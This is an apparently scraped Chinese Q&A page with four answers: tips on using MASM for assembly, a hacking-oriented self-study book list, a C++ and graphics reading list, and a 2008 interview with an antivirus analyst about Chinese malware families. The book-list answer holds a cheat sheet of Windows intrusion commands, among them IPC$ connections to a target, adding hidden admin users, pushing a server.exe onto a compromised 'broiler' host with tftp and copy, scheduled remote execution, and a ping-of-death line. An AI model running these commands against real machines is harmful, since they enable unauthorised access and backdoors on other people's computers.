本文目录一览:
- 1、如何学好汇编语言?
- 2、我想自学计算机请问我要要买那些最基础的资料书啊
- 3、如何系统的学习c++,如有哪些书可以看,看书的顺序,比如有什么精彩的教学视屏可以学习,求各位大神指导
- 4、金山清理专家诊断无法显示逻辑驱动器
如何学好汇编语言?
正如你所说需要大量的训练,给你介绍个网站,我觉得还可以
另外要验证你写的程序是否正确,可用微软的ma *** 软件
ma *** 是微软出的汇编编译器,支持8088/8086架构的汇编语言,在DOS下运行,需要下载。ma *** 包括:
(1)编辑程序edit.exe
(2)汇编程序ma *** .exe
(3)连接程序link.exe
(3)调试程序debug.exe
基本使用 *** 如下,仅供参考:
用之前更好把上面的几个文件保存到盘符下的文件夹里,文件夹名字尽量简单明了,一切为了操作简单。
(1)更好不要用edit.exe,而用记事本编辑汇编程序,这样操作比较方便。保存时,文件类型选为所有文件,再在文件名后面加上.a *** ,保存即可。
(2)打开命令提示行(运行--输入cmd--确定),敲命令进入ma *** 所在文件夹,输入ma *** *.a *** (*表示文件名)回车。
这时会提示
Object filename [*.OBJ]:
表示要生成的目标文件名称,必须填,然后回车。提示
Source listing [NUL.LST]:
表示是否要生成列表文件,填写这生成.lst文件,不填则放弃生成.lst文件。.lst文件用记事本打开能看到源代码的语法错误,查错想当方便,****强烈建议生成****。回车后提示
Cross-reference [NUL.CRF]:
表示生成交叉引用文件.crf,如果有多个.obj文件参与连接就要生成,回车后显示错误数量等信息,编译完成。
(3)输入link *(.obj文件名)
一路回车,返回时已经生成了*.exe。
(4)debug使用比较复杂,不多介绍
我想自学计算机请问我要要买那些最基础的资料书啊
1.《黑客入门》
这是我看的之一本黑客书籍,是比较初级的一些黑客知识,但是后面的实例运用到了html代码,主要是讲
网页方面入侵知识,当时我自己也看不懂那些,因此就去把html学一下(其实也就是看看代码而已,自己
根本写不出啥代码来,呵呵……)
2.《30天打造专业红客》
任何一本写着什么几天精通,几天速成的书,其实都是不可信的,但这不是我们现在要讲的问题,这本书
可以弥补上本书中的本足之处,里面有一些内容可能讲得会比较详细些,适合初学者。
3.《防黑档案》
这本书是东方飘云写的,好像就是绿色兵团的副司令吧,呵呵,我先顶一下…………
4.《黑客攻防实战入门》
这是一本以实战为主线的黑客书籍,大力推荐!!!必竟电脑技术本来就是要在实践中才能提高的,光靠
理论是行不通,你可以边看此书边操作,相信对于你的实战能力会有所帮助的。
上面这些都是一些黑客入门方面的书籍,其中有部分是相同,大家可择其善者而从之!!!
5.《C语言程序设计》
不学编程的人是永远不可能成为黑客的,因此学编程也成为我们在学黑道路上的必经之路,也是最需要精
力与耐力的过程。这本就是谭浩强写的那本,大家也可以看看老外写的那本《the c programe language》,
如果你能将书中的代码都自己调试操作一遍,对于C语言基础知识的掌握应该不成问题。
6.《VC++深入详解》
这是一本他人根据孙鑫的视频教程编写的一本书,因此这本书也就有其配套视频了,地址如下:
7.《IBM-PC汇编语言程序设计》
这是清华大学出版的,虽然有点过时了,是本16位机器时代的,与现在的win32,win64有点差别,但其本
质也是大同小异的,相信对于想学习逆向分析的战友们,汇编也是一项必修课啊,关于此书,各位可以看
看中山大学的汇编语言视频教程,其教学方式也是比较新颖的,大家一看便知,地址如下:
如果想要看在线视频,可通过下面地址查看:,
将后面的hb01改为02,03……即可,不过很慢,缓冲都要N久,我是等得不耐烦了,呵呵
8.《windows环境下的32位汇编语言程序设计》
就是罗云彬写的那本,如果你学完了上本汇编书籍或视频,那么就可以开始学习win32汇编了,要知道这本
书我是用手机看的,呵呵,不容易啊,因为缺乏实践,因此自己学得也不咋滴,自己是打算先简单看一遍
,简单了解个大概,再看第二遍,这遍以实践操作为主,最后再系统地复习一遍,这项任务,本人尚未完
成啊,以上意见也只是给大家做个参考而已,希望对大家有所帮助。
9.《ASP从入门到精通》
想学脚本入侵的战友,脚本语言是一定要学的,有机会也更好自己做个博客之类的站点。这本书后面有很
多的实例项目,如后台管理,收费系统等等。另外还有一本我自己看过的关于asp的书——《ASP可视化编
程与应用》,此书是在dreamweaver下面的实践操作,也算是在学asp的同时,也学习一下dreamweaver的
使用,一举两得。这两本书中对html以及vbscript均有所讲解,因为asp中可嵌入vbscript,javascript.
10.《php高手宝典》
此书我是没看过,只是看了下目录与开头而已,打算后面有时间再补看一下,因此对此书我也没有什么发
言权了,有看过的战友可以发表一下意见。
11.《黑客反汇编揭秘》
这是一本关于逆向分析的书,与其配套的还有一本叫《黑客调试技术揭秘》,反汇编这本书网上有电子书
,大家可下载来看,pdf格式的,但是调试这本书我没找到,在网上写着调试的书名,下载下来才发现是反
汇编那本书.这两本书对汇编知识均有一定的要求,因此建议大家先学完汇编再看。
12.《 *** 黑客加密与解密》
这本书里面有一些脚本入侵方面的一点知识,内容较少,主要是讲加解密方面的知识,后面有大部分的破
解实例讲解,但注释较少,我自己当时也是看得迷糊迷糊的(没办法,自己汇编能力差点,呵呵)
13.《加密解密全方位学习》
这本书我是在图书馆看到的,适合加解密初学者,因为这本书要求的预备知识不高,只要有点C语言基础就
可以,里面会讲到一些相对简单些的汇编指令,以及crackme的简单 *** ,还有注册机的编写(个人觉得不
是很详细)
14.《加密与解密》
就是看雪学院那本书,第三版快出来了,就在这一二月份吧!我 看的是第二版的电子书,还没看完,这本
书在加解密方面写得算是比较完整详细的了,而且是从基础讲起,循序渐进,大力推荐,若要学习逆向工
程,看雪学院也确实是个不错的地方。
15.《shellcode编程揭秘》
这是一本关于缓冲区溢出攻击的书,我自己也没看过,不过电子书倒是有,就放在邮箱里面,呵呵,打算
后面再看,关于溢出攻击的书还有很多,如《 *** 渗透技术》,《缓冲区溢出攻击检测,预防,剖析》,
《the shellcode handbook》
16.《深入理解计算机系统》
此书也是我在图书馆借的,被我霸占了半年之久,这次又被我借回来复习一下了(真对不起各位书友啊,
呼呼……),这是一本站在程序员的角度写的一本书,因此也必须要有C语言基础,要是有unix系统的操作
经验会更好,因为这本书中的代码就是在UNIX下调试操作的。相信这本书对于你学出更好的代码会有一定
的帮助,其中还有特别的一章用来讲解如何编写高效的程序,并以一个实例代码来讲解,一步步地进行完
善,最终写出一个高效率的程序。这本书也是学溢出攻击方面的基础知识,在安全焦点上也说这本书是《
*** 渗透技术》的基础知识,但看完这本书也不一定能看懂网渗,呵呵……
17.《rootkit:windows内核安全防护》
内容简介
本书是目前之一本关于rootkit的详尽指南,包括rootkit的概念、它们是怎样工作的、如何构建和检测它们
。世界顶级软件安全专家、rootkit.com创始人Greg Hoglund和James Butler向大家详细介绍攻击者是如何
进入系统并长期驻留而不会被检测到的,以及黑客是如何摧毁Windows XP和Windows 2000内核系统的,
其概念可以应用于现代任何主流操作系统。通过本书,读者可以全面掌握rootkit,提升自己的计算机安全
防范能力.
18.《0day安全:软件漏洞分析技术》
四月份刚出版的,看雪论坛的,有看过一部分学得还不错,适合对溢出感兴趣的战友们。要告诉你点常识…虽然多,但都是基本的!希望你可以用心去学!
DOS 命令
net use ipipc$ " " /user:" " 建立IPC空链接
net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: ipc$ 登陆后映射对方C:到本地为H:
net use ipipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限,注意:
administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time 目标ip 查看对方时间
net time 目标ip /set 设置本地计算机时间与"目标IP"主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view ip 查看对方局域网内开启了哪些共享
net config 显示系统 *** 设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的 *** 连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的 *** 连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:"-w数字"用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:"-l[空格]数据包大小";"-n发送数据次数";"-t"指一直
ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参
数"/all"显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-
H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如"DEL/AR *.*"表示删除当前目录下所有只读文件,"DEL/A-
S *.*"表示删除当前目录下除系统文件以外的所有文件
二:
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统
确认就直接删除。(二个命令作用相同)
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向命
令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:
2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文
件)至本地C:
xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将"IP"的
server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式
(传送文本文件模式)进行传送
tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文
本文件时)
route print 显示出IP路由,将主要显示 *** 地址Network addres,子网掩码Netmask,网关地址Gateway
addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并更大化(最小化)运行某程序或命令 望采纳O(∩_∩)O
如何系统的学习c++,如有哪些书可以看,看书的顺序,比如有什么精彩的教学视屏可以学习,求各位大神指导
一.c++程序员看的书:
//------------------------------------------------------------
// 入门:
// Lippman的书就是经典!
//------------------------------------------------------------
《c++ primer》 --------- 强烈推荐! 初学者经典书
作者 Stan Lippman(c++大师,之一个C++编译器cfront作者之一)
//------------------------------------------------------------
// 初级:
// 从头到尾看过一遍,感觉对初学者还是很好的书籍
//------------------------------------------------------------
《C++编程思想》 --------- 强烈推荐! 初学者经典书
《高质量C++编程指南》 --------- 强烈推荐! 初学者经典书
//------------------------------------------------------------
// 扎实基础并提升level(本栏书籍不得不看!):
// 本栏书籍都已从头到尾看完.( 感觉好hi)
//------------------------------------------------------------
《Inside C++ Object Model》 -------- 极力推荐! 全面透彻了解c++ 从头到尾看完.
作者 Stan Lippman(c++大师,之一个C++编译器cfront作者之一)
《C++ Templates》 -------- 极力推荐! 全面透彻了解模板.
该书被业界誉为模板的圣经!
《c++编程新思维》 -------- 极力推荐! 被誉为挑战思维极限的书。
作者Andrei Alexandrescu就是 撰写Loki库的怪才!
读前请先看(Inside C++ Object Mode)和(C++ Templates)
《com本质论》 -------- 强烈推荐! 经典。
读前先看(Inside C++ Object Model)
《com原理与应用》 -------- 强烈推荐! 作者潘爱民.上书姐妹篇,读者可2选一.
//------------------------------------------------------------
// 提升exp:
//------------------------------------------------------------
《c++大规模编程》 --------- 强烈推荐! 非常好,大规模编程理当看看。看了没仔细看,不过得益不少.
《深入浅出MFC》 --------- 强烈推荐! MFC入门经典(看过一遍,这是让我知道侯杰的一本书.)
《stl源码分析》 --------- 强烈推荐! 了解stl的好书。作者侯杰. 看了一大半,然后就当参考书用了.
《Effective C++》或《More Effective C++》 --------- 经典。2001年买的书后来不见.
《设计模式》 --------- 经典。很薄,不过一直今没啃完.
//------------------------------------------------------------
// 不推荐读物:
//------------------------------------------------------------
《C++沉思录》 --------- 翻过一遍,感觉这本书实在是老了,现在来说可以不看。
二。游戏书籍:
《图形开发人员指南》 -------- 极力推荐! 国外经典好书!
下载:
;
《3D图形编程指南 》 -------- 强烈推荐! (3d入门好书)图形基础。好像是在原来mays的开发者网站下载的
《真实感图形算法》 -------- 极力推荐! ! 国内经典好书! 从朋友那借来的.现已绝版!
《游戏开发物理学》 -------- 推荐! 看朋友推荐就买了, 没看.
《Advanced 3-D Game Programming Using Directx 8.0》peter walsh
-------- 2002年看到的d3d入门好书,可惜没中文版,推荐买如下它的新版:
《Advanced 3D Game Programming Using DirectX 9.0 》
-------- 极力推荐!(d3d入门好书) 这是上一本的新版
《MatheMatics for 3d Game Programming Computer Graphics 》
-------- 极力推荐! 2002年看到的3d入门好书,可惜没中文版。
《Game Programming Gems 》1、2、3、4中文译本
-------- 强烈推荐! 资料文章, 买了前3本丢了第1卷,还没怎么看.
《3D游戏 卷1:实时渲染与软件技术 》
《3D游戏:卷2 动画与高级实时渲染技术 》-------- 强烈推荐!
作者:Alan Watt,Fabio Policarpo
Fly 3D SDK
两本都买了,在看.
《Real Time Rendering 》 -------- 强烈推荐! 本书因为其创新性被美国《游戏开发者》杂志(Game Developer Magazine)评为2002年度"前沿奖(ProntLineAward), 刚买.
《计算机图形学几何工具算法详解》 -------- 极力推荐! 原来是朋友Michael推荐给我的.刚买.
最近在看,感觉很好,是一本不仅说HOW还告诉你WHY的几何基础的图形书. 作者Schneider在沃特迪斯尼特色动画公司领导一个建模和动态模拟软件小组, 3维引擎“疯狂魔法”的设计师
《Maya5编程全攻略》 -------- 推荐! 插件相关,了解maya的设计理念,提高设计能力。很薄,看完了,感觉还不错.
《游戏之旅——我的编程感悟》 -------- 推荐! 2005年12月出版,新书.没看。
推荐!因为是云风出的。
三。windows编程及汇编:
(1)《windows核心编程》 by Jeffrey Richter -------- 强烈推荐! 已收藏,不过感觉说得不是很深.
(2)《win95 a developer's guide》 by Jeffrey Richter -------- 强烈推荐!
(3)《Windows 95 System Programming Secrets》 -------- 极力推荐! 这书的份量可用不得不看来说!
该书作者也是boundschecker内存泄露工具的撰写人
(4)《Inside Windows 2000》 -------- 强烈推荐!
(5)《80X86汇编语言程序设计教程 》 -------- 强烈推荐!
清华大学出的很好的一本书,我当初看了一大半之后丢在广州朋友家不见了。
(6)《保护方式下的80386及其编程 》 -------- 极力推荐! 好书哇! 也可当参考书用.
作者是80386 CPU的总设计师John Crwaford,以及Patrick Gelsinger
电子书:;;topic=10
(6)《硬盘扇区读写技术》 -------- 推荐! 很薄,个人爱好买了下来,可以透切了解扇区等技术。
(7)《Linux内核完全注释》 -------- 极力推荐! 透彻分析linux早期内核源码!
论坛:
电子版下载:
(8)《自己动手写操作系统》 -------- 极力推荐! 深入浅出了解系统底层
出版日期:
2005年8月.见
刚看完了。
要想了解操作系统原理,以上四本可以结合一起看
(9)《软件加密原理与应用》 -------- 强烈推荐! 国内软件加密公司出的好书
(10)《软件加解密技术内幕》 -------- 强烈推荐! 国内看雪力作!
(11)《黑客反汇编揭秘》 -------- 强烈推荐! 国外反调试、反跟踪等技术
(12)《代码优化:有效使用内存》 -------- 推荐!
(13)《组合语言之艺术》 -------- 推荐! 非常好的汇编语言。网上有电子档下.
(14)《编程高手箴言》 -------- 推荐! 看到作者是超级解霸作者,买了回来.
这是本很好书,不过由于是"箴言"所以内容有点散,有基础才看得懂,广西老乡哈。
(15) 《深入理解计算机系统》 -------- 极力推荐! 不得不看! 已从头到尾看完.(好hi)
国外经典教材! 作者Randal E.Bryant David O'Hallaron 著
(16) 《编译原理及实践》 -------- 极力推荐! 作者Louden, K.C
四. *** 编程:
《Cisco *** 技术教程》 -------- 强烈推荐! *** 程序入门书. 从朋友手里借来看完了,是一本不错的入门书.
《Windows *** 编程 》 -------- windows *** 编程参考书, 这书买回来不久书就脱线了,真郁闷,该书告诉你怎么在windows下使用api进行 *** 编程.要了解 *** 底层先看上一本再看下面一本吧.
《TCP/IP详解 》 1、2、3 作者:[美]W.Richard Stevers -------- 极力推荐! 我只有第1卷,感觉很不错的书.
《U用TCP/IP进行网际互联 》 作者:林瑶 等/译 ------- 上书姐妹篇
《UNIX *** 编程 》 作者:[美]W.Richard Stevers -------- 强烈推荐!
评价很高的书,还没看
《C++ *** 编程,卷1:运用ACE和模式消除复杂性》 -------- 强烈推荐!
评价很高的书,还没看
《C++ *** 编程,卷2:基于 ACE 和框架的系统化复用》-------- 强烈推荐!
评价很高的书,还没看
其实你可以百度的,比如我就是百度的- -
想当年我爸也要我学程序语,但是我看到那么多代码英语我就要晕死了。
希望你可以坚持下去。
金山清理专家诊断无法显示逻辑驱动器
感谢大家的踊跃提问,程虎作为一个反病毒专家,有处理不完的事情。当我收集完问题让他回答的当天,他
正要出差,但是他还是挤出时间来回答大家的问题,感谢他的配合和支持。也感谢大家的支持。。。
本栏目会继续努力,为大家请来更多的嘉宾进行技术学习和交流。
引用:
技术相关链接:
机械狗再度泛滥,金山毒霸专家推出整体方案
AV终结者来势汹汹
--------------------------------------------------------------------------------
作者: ButterflyLove 时间: 2008-4-7 10:47
引用:
一把锈剑 问: “请问睡大师 病毒调试小技巧 Oy ^_^”
专家回答:
有些技巧,但最主要的还是反汇编代码阅读能力,这个才是最关键的。至于调试技巧,本人实在不敢多说,因为都是zmworm等大虾教的,或者是看雪上学来的。建议多逛逛看雪论坛。
--------------------------------------------------------------------------------
作者: ButterflyLove 时间: 2008-4-7 10:48
(二)
引用:
幸福的耗子 问 :“请专家谈谈机器狗、av终结者、和磁碟机 的特点。如何防范机器狗、av终结者、和磁碟机?”
专家回答:
更大的特点都是游戏盗号木马下载器。
机器狗的特点是驱动级穿透还原,该 *** 同时还可以过部分主动防御和文件监控,但前提是杀毒软件没有这个病毒的特征,所以实时升级病毒库特别重要。
av终结者的特点是ring3环对抗杀毒软件,隐藏注册表启动项,使用文件名(进程目录下其它文件)、版本信息、在线更新的内存特征等方式关闭并删除杀毒软件程序。会感染 *** 、 *** Game、TT等目录。
磁碟机的特点是具备感染型特征,捆绑加密感染,变种很多。也会关闭杀毒软件。
防御 *** :
1、漏洞补丁打上;
2、打开文件实时监控;
3、实时升级病毒库;
4、开启网页防挂马功能。
5、禁用AutoRun自动播放功能。
这样不能保证不中毒,但可以降低中毒概率。病毒总是主动的(很多新病毒如机器狗等可以突破杀毒软件或主动防御),但杀毒软件如果能够及时更新病毒库,也可以很好的制止病毒进一步扩大感染范围。
--------------------------------------------------------------------------------
作者: ButterflyLove 时间: 2008-4-7 10:48
三)
引用:
chengdongxing 问 :“流行病毒的分析,讲讲看,怎么分析?”
专家回答:
分析病毒代码,涉及到静态分析、动态调试等。最重要的是汇编能力和windows编程能力。详细的请逛逛看雪学院。本人不是看雪出来的,但是师从看雪前辈,或者该说兄弟。
--------------------------------------------------------------------------------
作者: ButterflyLove 时间: 2008-4-7 10:49
(四)
引用:
没吃饱的熊 问:“除了专杀工具,还有什么 *** 可以有效对付机器狗呢?(我朋友的机器已经启动不起来了,汗~~)比如用引导光盘启动,然后进行查杀,有什么推荐的吗?”
专家回答:
可以用毒霸的杀毒U盘在一台好的机器上升级病毒库到最新,然后用杀毒U盘引导启动那台中毒机器,并进行杀毒。
--------------------------------------------------------------------------------
作者: ButterflyLove 时间: 2008-4-7 10:49
(五)
引用:
▲Mr`dog” 问:“跟大伙儿分享下
找到可疑文件后是如何找出二进程代码
来确定是哪个病毒的变种(MS不通顺)?”
专家回答:
还是需要分析病毒的,通过行为仅仅能分辨是不是病毒,或者跟哪个病毒具有相似的行为,如果要确定是哪个病毒,必须详细分析病毒。 *** 同问题3的答案。
--------------------------------------------------------------------------------
作者: ButterflyLove 时间: 2008-4-7 10:50
(六)
引用:
▲IP PH-Winter 问:
请问水大师金山在做专杀的时候怎么想到要添加修复功能
包括面对机器狗时提供正常的 Userinit 以供替换
以及面对磁碟机时加入 kavdx 以清除感染?
P.S. 水大师贵庚? ^^
P.S. 又 P.S.
敏感+尖锐问题:
水大师对专杀被毒霸主防误报(6.4)及专杀生成物(TMP)被监控杀掉(6.7)有何看法?
专家回答:
很容易想到,因为用户在清完毒之后系统还是有各种各样的问题,既然我着手这一块了,就要对用户负责。至于加入kavdx,毒霸有很好的查杀感染型病毒的引擎,并且磁碟机变种相当多,如果用专杀查杀磁碟机,编写会费时费力,还要让用户等上很久,kavdx解决了该问题。
至于我的年龄,还是保密吧。^^
专杀被毒霸主防误报的问题,是由于当时加班到很晚,没来得级入误报库导致的,因为专杀的病毒特征没有加密。以后会尽量避免类似问题。专杀生成物(TMP)被杀,因为专杀带了脱壳模块,生成的临时文件,因为专杀特征有限,没查杀这些病毒,因此脱壳生成的tmp文件被监控检测到病毒导致的,建议用户使用毒霸全面杀下毒。
--------------------------------------------------------------------------------
作者: ButterflyLove 时间: 2008-4-7 10:50
(七)
引用:
阿达~ 问:“
请问 程先生,初学者学习反汇编,应该从哪里学起?
”
专家回答:
1、汇编教材,当时清华大学的黄色封面的那本,不知道现在有没有更好的。
2、《黑客反汇编揭秘》。
;tid=21907035 这里 你去看下